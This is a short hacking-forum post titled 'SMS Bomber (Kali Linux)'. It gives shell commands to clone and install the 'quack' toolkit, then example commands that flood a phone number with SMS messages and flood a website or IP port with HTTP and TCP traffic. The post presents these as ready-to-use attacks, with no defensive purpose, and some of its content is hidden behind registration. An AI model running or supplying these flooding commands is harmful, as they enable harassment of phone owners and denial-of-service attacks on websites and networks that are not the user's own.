SMS Bomber (Kali Linux) (1 Viewer)

Joined
Aug 30, 2020
Credits
0
Rating - 0%
SMS Bomber ; Kurulum ve Detaylı Video

View hidden content is available for registered users!
View hidden content is available for registered users!


git clone https://github.com/entynetproject/quack

cd quack

chmod +x install.sh

./install.sh

Quack Toolkit examples

Example of the SMS attack
quack --tool SMS --target 15554443333 --timeout 10 --threads 10

Example of the HTTP attack
quack --tool HTTP --target http://example.com/ --timeout 10 --threads 10

Example of the TCP attack
quack --tool TCP --target 192.168.1.100:80 --timeout 10 --threads 10
 

Users who are viewing this thread

Top